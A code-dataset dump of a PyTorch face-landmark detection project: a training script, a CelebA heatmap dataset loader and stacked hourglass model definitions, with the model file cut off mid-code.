"path": "/TestedTrek/TestedTrek/src/StarTrek/PhotonTorpedo.h",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#ifndef PHOTON_TORPEDO_HEADER\n#define PHOTON_TORPEDO_HEADER\n\nnamespace StarTrek\n{\n\nclass PhotonTorpedo\n{\npublic:\n PhotonTorpedo();\n ~PhotonTorpedo();\n\n int getPhotonTorpDamage();\n bool didTorpedoHit( int distance );\n};\n\n} // namespace StarTrek\n\n#endif // PHOTON_TORPEDO_HEADER\n"
},
{
"alpha_fraction": 0.6104995608329773,
"alphanum_fraction": 0.6130397915840149,
"avg_line_length": 27.14285659790039,
"blob_id": "cf0d05d485b17e930fe0bbc9a5fad832a4ba3156",
"content_id": "144aa4ad43ee6a8d95e67f8a418d2028f962bc1b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1181,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 42,
"path": "/pyset/watcher.py",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "import argparse\nimport os\nimport subprocess\nimport time\n\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\n\ndef get_args():\n parser = argparse.ArgumentParser(\n description=\"A File Watcher that executes the specified tests\"\n )\n parser.add_argument('--tests', action=\"store\", required=True,\n help='The path to the test file to run')\n return parser.parse_args()\n\nclass FW(FileSystemEventHandler):\n def __init__(self, test_file_path):\n self.test_file_path = test_file_path\n\n def on_any_event(self, event):\n\n if os.path.exists(self.test_file_path):\n cmd = ['python', self.test_file_path]\n subprocess.call(cmd)\n print '-' * 70\n\nif __name__ =='__main__':\n args = get_args()\n observer = Observer()\n path = args.tests\n fobj = FW(path)\n\n if os.path.exists(path) and os.path.isfile(path):\n observer.schedule(fobj, os.path.dirname(path), recursive=True)\n observer.start()\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n observer.stop()\n observer.join()"
},
{
"alpha_fraction": 0.48273274302482605,
"alphanum_fraction": 0.4842342436313629,
"avg_line_length": 37.08571243286133,
"blob_id": "d7cc9716a45a0a94000f87c394d558f77f297977",
"content_id": "3e0061d6613be7b90c1e8fe0012c7f17ed0e675a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1332,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 35,
"path": "/battleship/player.py",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "class Player:\n \n def __init__(self, player_map):\n self.map = player_map\n self.ships = {}\n \n def check_location(self, ship, direction, x, y):\n if self.map.valid_ship_position(x, y):\n if direction == 'H':\n return self.map.valid_ship_position(x + ship.size - 1, y)\n else:\n return self.map.valid_ship_position(x, y + ship.size - 1)\n return False\n \n def place_ship(self, ship, direction, x, y):\n if self.check_location(ship, direction, x, y):\n if direction == 'H':\n for pos in range(x, x + ship.size):\n self.map.ship_locations[pos, y] = True\n self.ships[ship] = [(pos, y) for pos in range(x, x + ship.size)]\n else:\n for pos in range(y, y + ship.size):\n self.map.ship_locations[x, pos] = True\n self.ships[ship] = [(x, pos) for pos in range(y, y + ship.size)]\n else:\n print 'Ship cannot be placed in this location'\n \n def attack(self, x, y):\n if self.map.valid(x, y):\n self.map.attack(x, y)\n for ship in self.ships:\n if (x, y) in self.ships[ship]:\n ship.it_hit()\n return True\n return False"
},
{
"alpha_fraction": 0.33955660462379456,
"alphanum_fraction": 0.33955660462379456,
"avg_line_length": 25.8125,
"blob_id": "95de0b87091dd8ade183c5174a9c8be92d1ef65a",
"content_id": "5230ce96c4af8a80c5fe015e72d8d06932356d0a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 857,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 32,
"path": "/battleship/wxBattleship.py",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "# wxBattleship.py\n\nimport wx\n\n########################################################################\nclass BattleshipPanel(wx.Panel):\n \"\"\"\"\"\"\n\n #----------------------------------------------------------------------\n def __init__(self):\n \"\"\"Constructor\"\"\"\n wx.Panel.__init__(self, parent)\n \n row_sizer = wx.BoxSizer(wx.HORIZONTAL)\n \n \n########################################################################\nclass BattleshipFrame(wx.Frame):\n \"\"\"\"\"\"\n\n #----------------------------------------------------------------------\n def __init__(self):\n \"\"\"Constructor\"\"\"\n wx.Frame.__init__(self, None, title='Battleship')\n panel = BattleshipPanel(self)\n self.Show()\n \n \nif __name__ == '__main__':\n app = wx.App(False)\n frame = BattleshipFrame()\n app.MainLoop()"
},
{
"alpha_fraction": 0.6702253818511963,
"alphanum_fraction": 0.6785290837287903,
"avg_line_length": 28.034482955932617,
"blob_id": "8cf037bc9ceaf7fdcc7b662bd8690ea849ce29de",
"content_id": "2b088299475170ee81859464bb56b7bfec33f61c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1686,
"license_type": "permissive",
"max_line_length": 110,
"num_lines": 58,
"path": "/MessTrek/Tests/YourTests.cpp",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "\n\n#include \"gtest/gtest.h\"\n#include \"gmock/gmock.h\"\n\n#include \"StarTrek/Game.h\"\n#include \"StarTrek/Klingon.h\"\n\nusing ::testing::Return;\nusing namespace StarTrek;\n\nclass WebGadgetProxyMock : public WebGadgetProxy\n{\npublic:\n WebGadgetProxyMock() : WebGadgetProxy( NULL ) {}\n MOCK_METHOD1(parameter, string(string));\n MOCK_METHOD1(variable, void*(string));\n MOCK_METHOD1(writeLine, void(string));\n};\n\nclass KlingonMock : public Klingon\n{\npublic:\n MOCK_METHOD0(distance, int());\n MOCK_METHOD0(energy, int());\n MOCK_METHOD0(destroy, void());\n};\n\nclass RandomNumberMock : public StarTrek::Game::RandomGenerator\n{\npublic:\n MOCK_METHOD1(Get, int(int));\n\n};\n\nTEST(StarTrekCharacterization, FirePhotonDestroyKlingon) {\n std::unique_ptr<RandomNumberMock> gen( new RandomNumberMock() );\n EXPECT_CALL( *gen, Get( ::testing::_ ) ).WillRepeatedly(Return(1));\n Game g( std::move( gen ) );\n WebGadgetProxyMock wg;\n KlingonMock kl;\n EXPECT_CALL( wg, parameter( ::testing::StrEq(\"command\"))).WillRepeatedly(Return(string(\"photon\")));\n EXPECT_CALL( wg, variable( ::testing::StrEq(\"target\"))).WillOnce(Return((void*)&kl));\n EXPECT_CALL( wg, writeLine( \"Photons hit Klingon at 0 sectors with 801 units\" )).WillRepeatedly(Return());\n EXPECT_CALL( wg, writeLine( \"Klingon destroyed!\" )).WillRepeatedly(Return());\n EXPECT_CALL( kl, distance() ).WillOnce(Return(0));\n EXPECT_CALL( kl, energy() ).WillOnce(Return(1));\n EXPECT_CALL( kl, destroy() ).WillOnce( Return() );\n g.fireWeapon( wg );\n}\n\n\nint main(int argc, char** argv)\n{\n StarTrek::Game game;\n // run all tests\n ::testing::InitGoogleTest(&argc, argv);\n\n return RUN_ALL_TESTS();\n}\n"
},
{
"alpha_fraction": 0.6051374077796936,
"alphanum_fraction": 0.6075268983840942,
"avg_line_length": 23.799999237060547,
"blob_id": "23856e04628ace1a1df0396f75e403b912c98fd0",
"content_id": "514b9e7521dfeef170fab9f0c08ef0b054cf148f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3348,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 135,
"path": "/TestedTrek/TestedTrek/src/StarTrek/Game.cpp",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#include \"stdafx.h\"\n\n#include <sstream>\n\n#include \"Game.h\"\n#include \"Klingon.h\"\n#include \"Galaxy.h\"\n\nnamespace StarTrek {\n\nGame::Game() : phaser_ammo(10000), photon_torpedos(8) {\n generator = &rand;\n}\n\nvoid Game::fireWeapon(Galaxy& galaxy) {\n Klingon* enemy = (Klingon*)galaxy.variable(\"target\");\n int distance = -1;\n if ( enemy )\n {\n distance = enemy->distance();\n }\n\n if (galaxy.parameter(\"command\") == \"phaser\") {\n int amount = atoi(galaxy.parameter(\"amount\").c_str());\n attackWithPhaser( enemy, amount, distance, galaxy );\n\n } else if (galaxy.parameter(\"command\") == \"photon\") {\n attackPhotonTorpedo( enemy, distance, galaxy );\n }\n}\n\nvoid Game::fireWeapon(Untouchables::WebGadget* webGadget) {\n Galaxy galaxy(webGadget);\n fireWeapon(galaxy);\n}\n\nint Game::energyRemaining(void) {\n return phaser_ammo;\n}\n\nint Game::torpedoes(void) {\n return photon_torpedos;\n}\n\nvoid Game::torpedoes(int value) {\n photon_torpedos = value;\n}\n\nvoid Game::hitKlingon( Klingon* enemy, int damage, Galaxy& galaxy )\n{\n enemy->hit( damage );\n\n if ( enemy->isDead() )\n {\n galaxy.writeLine(\"Klingon destroyed!\");\n enemy->destroy();\n }\n else\n {\n stringstream message;\n message << \"Klingon has \" << enemy->energy() << \" remaining\";\n galaxy.writeLine(message.str());\n }\n}\n\nbool Game::hasEnoughPhaserAmmo( int amount )\n{\n return phaser_ammo >= amount;\n}\n\nbool Game::hasEnoughPhotoTorpedos()\n{\n return photon_torpedos > 0;\n}\n\nvoid Game::reducePhaserAmmo( int amount )\n{\n phaser_ammo -= amount;\n}\n\nvoid Game::reducePhotoTorpedos()\n{\n --photon_torpedos;\n}\n\nvoid Game::attackWithPhaser( Klingon* enemy, int amount, int distance,\n Galaxy& galaxy )\n{\n if ( hasEnoughPhaserAmmo( amount ) ) {\n if ( !m_phaser.arePhasersInRange(distance) ) {\n stringstream message;\n message << \"Klingon out of range of phasers at \" << distance << \" sectors...\";\n galaxy.writeLine(message.str());\n } else {\n int damage = m_phaser.getPhaserDamage( amount, distance );\n stringstream message;\n message << \"Phasers hit Klingon at \" << distance << \" sectors with \" << damage << \" units\";\n galaxy.writeLine(message.str());\n hitKlingon( enemy, damage, galaxy );\n }\n reducePhaserAmmo( amount );\n\n } else {\n galaxy.writeLine(\"Insufficient energy to fire phasers!\");\n }\n}\n\nvoid Game::attackPhotonTorpedo( Klingon* enemy, int distance, Galaxy& galaxy )\n{\n if ( hasEnoughPhotoTorpedos() ) {\n if ( !m_photon_torp.didTorpedoHit( distance ) ) {\n photonTorpedoMissed( distance, galaxy );\n } else {\n int damage = m_photon_torp.getPhotonTorpDamage();\n stringstream message;\n message << \"Photons hit Klingon at \" << distance << \" sectors with \" << damage << \" units\";\n galaxy.writeLine(message.str());\n\n hitKlingon( enemy, damage, galaxy );\n }\n reducePhotoTorpedos();\n\n } else {\n galaxy.writeLine(\"No more photon torpedoes!\");\n }\n}\n\nvoid Game::photonTorpedoMissed( int distance, Galaxy& galaxy )\n{\n stringstream message;\n message << \"Torpedo missed Klingon at \" << distance << \" sectors...\";\n galaxy.writeLine(message.str());\n}\n\n}\n"
},
{
"alpha_fraction": 0.6437994837760925,
"alphanum_fraction": 0.6437994837760925,
"avg_line_length": 17.899999618530273,
"blob_id": "6adaf7413bfbd824a70a6a08690d3529e4372e69",
"content_id": "a36ca2a9834a677c664e3fc2dae0a67764d15dc2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 379,
"license_type": "permissive",
"max_line_length": 49,
"num_lines": 20,
"path": "/SuperSet/SuperSet/Set.h",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#pragma once\n\n#include <vector>\n\nclass Set\n{\npublic:\n Set(void);\n ~Set(void);\n\n bool isEmpty() const;\n void add( unsigned int to_add );\n bool contains( unsigned int to_check ) const;\n void remove( unsigned int to_remove );\n Set getIntersection( const Set& other );\n Set getUnion( const Set& other );\n\nprivate:\n std::vector<unsigned int> m_storage;\n};\n\n"
},
{
"alpha_fraction": 0.639356791973114,
"alphanum_fraction": 0.6424195766448975,
"avg_line_length": 33.394737243652344,
"blob_id": "d52a15769d022435d8ca4caed25ca236dd20dbc9",
"content_id": "ea4f1a8f42b25a4815ba97cea6224ef923401268",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1306,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 38,
"path": "/password_tester/password.py",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "import string\n\nclass CharacterInString:\n def __init__(self, characters, string):\n self.characters = characters\n self.string = string\n \n def evaluate(self):\n for char in self.characters:\n if char in self.string:\n return True\n return False\n \nclass LengthOfString:\n def __init__(self, required_length, string):\n self.required_length = required_length\n self.string = string\n \n def evaluate(self):\n return len(self.string) > self.required_length\n\ndef check(password, admin=False):\n errors = set()\n \n def validate( validateclass, exception ):\n if not validateclass.evaluate():\n errors.add(exception)\n \n validate( LengthOfString( 7, password ), 'TooShortException' )\n validate( CharacterInString( string.ascii_letters, password ), 'NoAlphabeticException')\n validate( CharacterInString( string.digits, password), 'NoDigitException')\n if admin:\n validate(LengthOfString(10, password),'AdminTooShortException')\n validate(CharacterInString(string.punctuation, password), 'AdminNoSpecialCharacterException')\n validate(CharacterInString(password[-1:], string.punctuation+string.digits), \n 'AdminLastCharacterIsNotSpecialOrNumber') \n \n return errors"
},
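The checker returns a set of rule names instead of raising, so callers can report every failure at once. A short usage sketch, with the expected results taken from the accompanying `password_test.py`:

```python
import password

password.check('abcdefg7')                  # set(): a valid user password
password.check('12345678')                  # {'NoAlphabeticException'}
password.check('abc123def456', admin=True)
# {'AdminNoSpecialCharacterException'}: admin passwords also need a
# punctuation character somewhere in the string
```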
{
"alpha_fraction": 0.7018970251083374,
"alphanum_fraction": 0.7018970251083374,
"avg_line_length": 15.772727012634277,
"blob_id": "b93030b340620cf759f2590051bd08a196ed5035",
"content_id": "22112342d091822d46529dd6d9ed5fcd0107c223",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 369,
"license_type": "permissive",
"max_line_length": 61,
"num_lines": 22,
"path": "/LunEx/src/stockquote.h",
"repo_name": "driscollis/labs-cpp-gtest",
"src_encoding": "UTF-8",
"text": "#ifndef STOCKQUOTE_H\n#define STOCKQUOTE_H\n\n#include <string>\n\nclass LunExServices;\n\nclass StockQuote\n{\npublic:\n StockQuote( std::string symbol, LunExServices& service );\n\n double Price( double shares ) const;\n double Total( double shares ) const;\n\nprivate:\n double m_price;\n std::string m_symbol;\n LunExServices& m_service;\n};\n\n#endif // STOCKQUOTE_H\n"
}
] | 32 |
Steve-Tod/hourglass-face-landmark
|
https://github.com/Steve-Tod/hourglass-face-landmark
|
f401dcbe261a006dec6015900bf869411fa319b3
|
7ccb81fff756a3001e48c3c3498399808c662d03
|
b4248ae10faf10bd73c203e7713ed0570ffeb978
|
refs/heads/master
| 2021-07-12T04:44:32.496859 | 2020-07-17T00:04:15 | 2020-07-17T00:04:15 | 181,874,724 | 6 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.561279296875,
"alphanum_fraction": 0.566650390625,
"avg_line_length": 42.11579132080078,
"blob_id": "cbebaeee6731f47e2462444fab21ec9628f23736",
"content_id": "d36771db717b4f5c7bbb02ab6bb437a3bfa7e109",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4096,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 95,
"path": "/train.py",
"repo_name": "Steve-Tod/hourglass-face-landmark",
"src_encoding": "UTF-8",
"text": "import argparse, random, pprint, os\nfrom tqdm import tqdm\nfrom options.options import parse_opt\nfrom utils import utils\n\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Train Hourglass Model')\n parser.add_argument('-opt', type=str, required=True, help='Path to options JSON file.')\n opt = parse_opt(parser.parse_args().opt)\n \n from data import create_dataloader\n from solver.HourGlassSover import HourGlassSover\n\n pprint.pprint(opt)\n train_dl = create_dataloader(opt['datasets']['train'])\n print('===> Train Dataset created, Number of images: [%d]' % (len(train_dl) * opt['datasets']['train']['batch_size']))\n val_dl = create_dataloader(opt['datasets']['val'])\n print('===> Validation Dataset created, Number of images: [%d]' % (len(val_dl)))\n\n solver = HourGlassSover(opt)\n\n if opt['use_tb_logger']:\n from tensorboardX import SummaryWriter\n tb_logger = SummaryWriter(log_dir=opt['path']['tb_logger_root'])\n print('===> tensorboardX logger created, log to %s' % (opt['path']['tb_logger_root']))\n\n NUM_EPOCH = opt['train']['num_epochs']\n current_step = 0\n start_epoch = solver.cur_epoch\n \n for epoch in range(start_epoch, NUM_EPOCH + 1):\n solver.cur_epoch = epoch\n \n print('===> Train epoch %3d, learning rate: %.4f' % (epoch, solver.get_current_learning_rate()))\n solver.records['lr'].append(solver.get_current_learning_rate())\n with tqdm(total=len(train_dl), desc='Epoch: [%d/%d]'%(epoch, NUM_EPOCH), miniters=1) as t:\n train_loss = []\n for i, sample in enumerate(train_dl):\n solver.feed_data(sample)\n loss = solver.train_step()\n train_loss.append(loss)\n if current_step % opt['train']['log_interval'] == 0 and current_step > 0:\n tb_logger.add_scalar('train loss', loss, global_step=current_step)\n current_step += 1\n t.set_postfix_str(\"Batch Loss: %.4f\" % loss)\n t.update()\n mean_train_loss = sum(train_loss) / len(train_loss)\n solver.records['train_loss'].append(mean_train_loss)\n print('\\nEpoch: [%d/%d] Avg Train Loss: %.6f' % (epoch, NUM_EPOCH, mean_train_loss))\n \n print('===> Validate epoch %3d' % (epoch))\n val_loss = []\n nme_all = []\n with tqdm(total=len(val_dl), desc='Epoch: [%d/%d]'%(epoch, NUM_EPOCH), miniters=1) as t:\n for i, sample in enumerate(val_dl):\n solver.feed_data(sample)\n img_name = os.path.basename(sample['path'][0])\n loss = solver.evaluate()\n val_loss.append(loss)\n nme = solver.calc_nme()\n nme_all.append(nme)\n if i < opt['train']['num_save_image']:\n solver.log_current_visual(img_name, tb_logger, current_step)\n solver.save_current_visual(img_name, epoch)\n t.set_postfix_str(\"Val Loss: %.4f, NME: %.4f\" % (loss, nme))\n t.update()\n \n epoch_is_best = False\n mean_val_loss = sum(val_loss) / len(val_loss)\n mean_nme = sum(nme_all) / len(nme_all)\n if solver.best_pred > mean_nme:\n solver.best_pred = mean_nme\n solver.best_epoch = epoch\n epoch_is_best = True\n \n solver.records['val_loss'].append(mean_val_loss)\n solver.records['nme'].append(mean_nme)\n if opt['use_tb_logger']:\n tb_logger.add_scalar('val loss', mean_val_loss, global_step=current_step)\n tb_logger.add_scalar('nme', mean_nme, global_step=current_step)\n \n print('Epoch: %03d, Mean NME: %.4f, Mean loss: %.4f\\nBest Epoch: %03d, Best NME: %.4f' % \n (epoch, mean_nme, mean_val_loss, solver.best_epoch, solver.best_pred))\n \n solver.update_learning_rate(epoch)\n solver.save_checkpoint(epoch, epoch_is_best)\n solver.save_current_log()\n\n \n print('===> Finished !')\n \nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.8186812996864319,
"alphanum_fraction": 0.8186812996864319,
"avg_line_length": 44.5,
"blob_id": "56bfd71d780e3cb99815da398498b0f8475594b4",
"content_id": "359d6cae4f00e5364ff652d9d39d4040e8b63530",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 182,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 4,
"path": "/README.md",
"repo_name": "Steve-Tod/hourglass-face-landmark",
"src_encoding": "UTF-8",
"text": "# hourglass-face-landmark\nFace landmark detection using hourglass model\n\nCode for Hourglass model from this [repo](https://github.com/raymon-tian/hourglass-facekeypoints-detection).\n"
},
{
"alpha_fraction": 0.49341341853141785,
"alphanum_fraction": 0.5131731629371643,
"avg_line_length": 41.6694221496582,
"blob_id": "c329f2ade92c26ce20cea926c1d9860aa4667411",
"content_id": "ae8f2aab141ff9609fd1812c7dddc4916f9b5339",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5162,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 121,
"path": "/data/dataset.py",
"repo_name": "Steve-Tod/hourglass-face-landmark",
"src_encoding": "UTF-8",
"text": "import re, os, random\nfrom PIL import Image\nimport numpy as np\nimport torch\nfrom torchvision import transforms\nimport torch.utils.data as data\n\nclass FaceLandmarkDataset(data.Dataset):\n def __init__(self, opt):\n super(FaceLandmarkDataset, self).__init__()\n self.opt = opt\n self.train = (opt['phase'] == 'train')\n self.info_list = self._get_info_list(opt)\n self.transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(\n mean=opt['mean'], std=[1.0, 1.0, 1.0])\n ])\n\n def __getitem__(self, index):\n info = self.info_list[index]\n img = Image.open(info[0])\n img, landmark, landmark_original = self._resize(img, info[1])\n gt = self._generate_gt((img.size[0] // 4, img.size[1] // 4), landmark,\n self.opt['gt_sigma']) # C*H*W\n img, gt = self._random_modify(img, gt)\n img = self.transform(img)\n gt = torch.from_numpy(np.ascontiguousarray(gt))\n return {'img': img, 'heatmap_gt': gt, 'path': info[0], 'landmark_gt': np.array(landmark_original)}\n\n def __len__(self):\n return len(self.info_list)\n\n def _resize(self, img, landmark):\n width, height = img.size\n new_width, new_height = min(width, height), min(width, height)\n left = (width - new_width)//2\n top = (height - new_height)//2\n right = (width + new_width)//2\n bottom = (height + new_height)//2\n\n cropped = img.crop((left, top, right, bottom))\n resized = cropped.resize((self.opt['input_length'], self.opt['input_length']), Image.BICUBIC)\n scale_0 = 1.0 * self.opt['input_length'] / new_width\n scale = 0.25 * scale_0 # 0.25 time resolution\n landmark_original = [((x[0] - left)*scale_0, (x[1] - top)*scale_0) for x in landmark]\n #landmark_resized = [(round((x[0] - left)*scale), round((x[1] - top)*scale)) for x in landmark]\n landmark_resized = [((x[0] - left)*scale, (x[1] - top)*scale) for x in landmark]\n return resized, landmark_resized, landmark_original\n \n def _random_modify(self, img, gt):\n if random.random() > 0.5 and self.opt['flip_v']:\n img = img.transpose(Image.FLIP_TOP_BOTTOM)\n gt = np.flip(gt, 1)\n if random.random() > 0.5 and self.opt['flip_h']:\n img = img.transpose(Image.FLIP_LEFT_RIGHT)\n gt = np.flip(gt, 2)\n if self.opt['rotate']:\n rot_rand = random.random()\n if rot_rand > 0.75:\n img = img.transpose(Image.ROTATE_90)\n gt = np.rot90(gt, k=1, axes=(1, 2))\n elif rot_rand > 0.5:\n img = img.transpose(Image.ROTATE_180)\n gt = np.rot90(gt, k=2, axes=(1, 2))\n elif rot_rand > 0.25:\n img = img.transpose(Image.ROTATE_270)\n gt = np.rot90(gt, k=3, axes=(1, 2))\n return img, gt\n\n def _generate_gt(self, size, landmark_list, sigma):\n heatmap_list = [\n self._generate_one_heatmap(size, l, sigma) for l in landmark_list\n ]\n return np.stack(heatmap_list, axis=0)\n\n def _generate_one_heatmap(self, size, landmark, sigma):\n w, h = size\n x_range = np.arange(start=0, stop=w, dtype=int)\n y_range = np.arange(start=0, stop=h, dtype=int)\n xx, yy = np.meshgrid(x_range, y_range)\n d2 = (xx - landmark[0])**2 + (yy - landmark[1])**2\n exponent = d2 / 2.0 / sigma / sigma\n heatmap = np.exp(-exponent)\n return heatmap\n\n def _get_info_list(self, opt):\n info_list = []\n if opt['type'] == 'celebA':\n img_root = opt['image_root']\n with open(opt['annotation_path'], 'r') as f:\n anno_list = f.read().strip('\\n').split('\\n')[2:]\n with open(opt['partition_path'], 'r') as f:\n part_list = sorted(f.read().strip('\\n').split('\\n'))\n for i, anno in enumerate(sorted(anno_list)):\n if opt['phase'] == 'train':\n if part_list[i][-1] != '0':\n continue\n elif opt['phase'] == 'val':\n if 
part_list[i][-1] != '1':\n continue\n elif opt['phase'] == 'test':\n if part_list[i][-1] != '2':\n continue\n else:\n raise NotImplementedError(\n 'Dataset phase %s is not recognized' % (opt['phase']))\n\n split = re.split('\\W+', anno)\n img_name = split[0] + '.' + split[1]\n assert len(split) == opt['num_keypoints'] * 2 + 2\n landmark = []\n for i in range(opt['num_keypoints']):\n landmark.append((int(split[2 * i + 2]), int(split[2 * i + 3])))\n info_list.append((os.path.join(img_root, img_name), landmark))\n else:\n raise NotImplementedError(\n 'Dataset type %s is not recognized' % (opt['type']))\n if not self.train:\n info_list = info_list[:1000]\n return info_list"
},
{
"alpha_fraction": 0.4947039484977722,
"alphanum_fraction": 0.5184928178787231,
"avg_line_length": 37.400001525878906,
"blob_id": "92275ccc65deb0a8b61c0799d36a48a8bd90a1cc",
"content_id": "b2cd4ec9e76b45c3cd817f2cc663e1a77445928f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5759,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 150,
"path": "/model.py",
"repo_name": "Steve-Tod/hourglass-face-landmark",
"src_encoding": "UTF-8",
"text": "import torch\nimport torch.nn as nn\n\nclass StackedHourGlass(nn.Module):\n def __init__(self, opt):\n super(StackedHourGlass, self).__init__()\n self.opt = opt\n self.num_feature = opt['num_feature']\n self.num_stack = opt['num_stack']\n self.pre_conv_block = nn.Sequential(\n nn.Conv2d(3, self.num_feature // 4, 7, 2, 3),\n nn.BatchNorm2d(self.num_feature // 4),\n nn.ReLU(inplace=True),\n ResidualBlock(self.num_feature // 4, self.num_feature // 2),\n nn.MaxPool2d(2, 2),\n ResidualBlock(self.num_feature // 2, self.num_feature // 2),\n ResidualBlock(self.num_feature // 2, self.num_feature),\n )\n self._init_stacked_hourglass()\n\n def _init_stacked_hourglass(self):\n for i in range(self.num_stack):\n setattr(self, 'hg' + str(i), HourGlass(self.opt['num_layer'], self.num_feature))\n setattr(self, 'hg' + str(i) + '_res1',\n ResidualBlock(self.num_feature, self.num_feature))\n setattr(self, 'hg' + str(i) + '_lin1',\n Lin(self.num_feature, self.num_feature))\n setattr(self, 'hg' + str(i) + '_conv_pred',\n nn.Conv2d(self.num_feature, self.opt['num_keypoints'], 1))\n if i < self.num_stack - 1:\n setattr(self, 'hg' + str(i) + '_conv1',\n nn.Conv2d(self.num_feature, self.num_feature, 1))\n setattr(self, 'hg' + str(i) + '_conv2',\n nn.Conv2d(self.opt['num_keypoints'], self.num_feature, 1))\n \n def forward(self,x):\n x = self.pre_conv_block(x) #(n,256,32,32)\n\n out = []\n inter = x\n\n for i in range(self.num_stack):\n hg = eval('self.hg'+str(i))(inter)\n # Residual layers at output resolution\n ll = hg\n ll = eval('self.hg'+str(i)+'_res1')(ll)\n # Linear layer to produce first set of predictions\n ll = eval('self.hg'+str(i)+'_lin1')(ll)\n # Predicted heatmaps\n tmpOut = eval('self.hg'+str(i)+'_conv_pred')(ll)\n out.append(tmpOut)\n # Add predictions back\n if i < self.num_stack - 1:\n ll_ = eval('self.hg'+str(i)+'_conv1')(ll)\n tmpOut_ = eval('self.hg'+str(i)+'_conv2')(tmpOut)\n inter = inter + ll_ + tmpOut_\n return out\n\n \nclass GHCU(nn.Module):\n def __init__(self, opt):\n super(GHCU, self).__init__()\n self.feature = nn.Sequential(\n self.conv_block(opt['in_channel'], 64, 5, 2), # B*64*16*16\n self.conv_block(64, 32, 5, 2), # B*32*8*8\n self.conv_block(32, 16, 3, 2), # B*16*4*4\n )\n self.regressor = nn.Sequential(\n nn.Linear(opt['feature_length'], 256),\n nn.Dropout2d(opt['drop_rate']), nn.ReLU(inplace=True),\n nn.Linear(256, opt['output_dim']))\n\n def forward(self, x):\n x = self.feature(x)\n x = self.regressor(x.view(x.size()[0], -1))\n return x\n\n def conv_block(self, num_in, num_out, kernel_size, stride, padding=None):\n if not padding:\n padding = (kernel_size - 1) // 2\n return nn.Sequential(\n nn.Conv2d(num_in, num_out, kernel_size, stride, padding),\n nn.BatchNorm2d(num_out), nn.ReLU(inplace=True))\n \n \nclass HourGlass(nn.Module):\n def __init__(self, num_layer, num_feature):\n super(HourGlass, self).__init__()\n self._n = num_layer\n self._f = num_feature\n self._init_layers(self._n, self._f)\n\n def _init_layers(self, n, f):\n setattr(self, 'res' + str(n) + '_1', ResidualBlock(f, f))\n setattr(self, 'pool' + str(n) + '_1', nn.MaxPool2d(2, 2))\n setattr(self, 'res' + str(n) + '_2', ResidualBlock(f, f))\n if n > 1:\n self._init_layers(n - 1, f)\n else:\n self.res_center = ResidualBlock(f, f)\n setattr(self, 'res' + str(n) + '_3', ResidualBlock(f, f))\n\n def _forward(self, x, n, f):\n up1 = eval('self.res' + str(n) + '_1')(x)\n\n low1 = eval('self.pool' + str(n) + '_1')(x)\n low1 = eval('self.res' + str(n) + '_2')(low1)\n if n > 1:\n low2 = self._forward(low1, n - 1, 
f)\n else:\n low2 = self.res_center(low1)\n low3 = low2\n low3 = eval('self.' + 'res' + str(n) + '_3')(low3)\n up2 = nn.functional.interpolate(low3, scale_factor=2, mode='bilinear', align_corners=True)\n\n return up1 + up2\n\n def forward(self, x):\n return self._forward(x, self._n, self._f)\n \n\nclass Lin(nn.Module):\n def __init__(self,numIn,numout):\n super(Lin,self).__init__()\n self.conv_block = nn.Sequential(\n nn.Conv2d(numIn,numout,1), \n nn.BatchNorm2d(numout),\n nn.ReLU(inplace=True)\n )\n def forward(self,x):\n return self.conv_block(x)\n \n \nclass ResidualBlock(nn.Module):\n def __init__(self, num_in, num_out):\n super(ResidualBlock, self).__init__()\n self.conv_block = nn.Sequential(\n nn.Conv2d(num_in, num_out // 2, 1), nn.BatchNorm2d(num_out // 2),\n nn.ReLU(inplace=True),\n nn.Conv2d(num_out // 2, num_out // 2, 3, stride=1, padding=1),\n nn.BatchNorm2d(num_out // 2), nn.ReLU(inplace=True),\n nn.Conv2d(num_out // 2, num_out, 1), nn.BatchNorm2d(num_out))\n self.skip_layer = None if num_in == num_out else nn.Sequential(\n nn.Conv2d(num_in, 